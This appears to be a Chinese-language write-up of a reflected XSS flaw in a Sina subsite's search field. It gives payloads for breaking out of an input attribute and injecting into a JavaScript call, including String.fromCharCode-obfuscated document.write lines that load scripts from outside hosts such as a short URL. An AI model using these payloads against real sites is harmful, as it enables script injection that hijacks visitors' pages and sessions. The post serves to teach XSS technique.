从新浪XSS漏洞浅谈XSS技巧
随着网络时代的飞速发展,网络安全问题越来越受大家的关注。当年杀遍大江南北的SQL注入攻击也随着各种防注入软件、waf或者CDN的出现开始慢慢离我们而去。一种非实时的攻击手段XSS跨站脚本攻击逆流而上,慢慢的开始在最近几年崛起,充分印证了“没有绝对的安全”这句话。
本文通过对新浪某分站的XSS漏洞向大家简述一些XSS漏洞的利用技巧,希望大家能有所收获。
XSS攻击:允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。SQL注入漏洞有很多技巧可以使用,在XSS攻击中也有很多技巧。
作者:小鸟
习科ID:zhj527641718
本身咱挺喜欢买彩票的,刚好有一天发现有新浪彩票这玩意,就顺便开看看。
在我截图的页面这里发现有一处搜索的地方,我在逛wooyun也曾经看到有很多大牛都在新浪,百度,和TX上挖XSS漏洞,我虽然不挖洞,不过直觉告诉我这里肯定有洞,于是便有了下文中总结的XSS漏洞的一些技巧。
目标:新浪爱知识人
工具:chrome,F12调试工具 {{{{@__@}}} 小编表示只会用IE的F12}
在页面中随手输入N个a,再用chrome下的F12可以看到
在input下的value存放了我输入的aaaa,然后以双引号”结束value取值。
如果input的type是text,那么value就是这个输入框里的值,输入框里是aaaaa,那么value也是aaaaa。既然页面中存放的value是输入框的取值,那么就来测试一下双引号”是否过滤。
如果没有咱就可以直接给他加事件,例如:
- aaaaa” onclick=”javascript:alert( ‘x’ )”
- <script>
- function thisinit()
- {
- $("syzs1").value = 50 - document.login.title.value.length;
- $("syzs2").value = 3000 - document.login.description.value.length;
- getTitleContent ('aaaaaaaa', '0');
- getTitleClass('0');
- autotenms();
- }
- if(window.Event) {
- window.onload = thisinit();
- } else {
- setTimeout(thisinit, 100);
- }
- </script>
- getTitleContent ('aaaaaaaa'+alert('a')+'Aaaaa', '0');
- <script>
- var a='q'
- var b='d'+a+'e'
- alert(b)
- </script>
- document.write('<script src='http://blackbap.org'></script>');
- document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,113,113,46,99,111,109,39,62,60,92,47,115,99,114,105,112,116,62))
- aaaaa'+document.write(String.fromCharCode (60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,120,46,99,111,47,49, 75,75,80,53,39,62,60,47,115,99,114,105,112,116,62))+'aaa
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/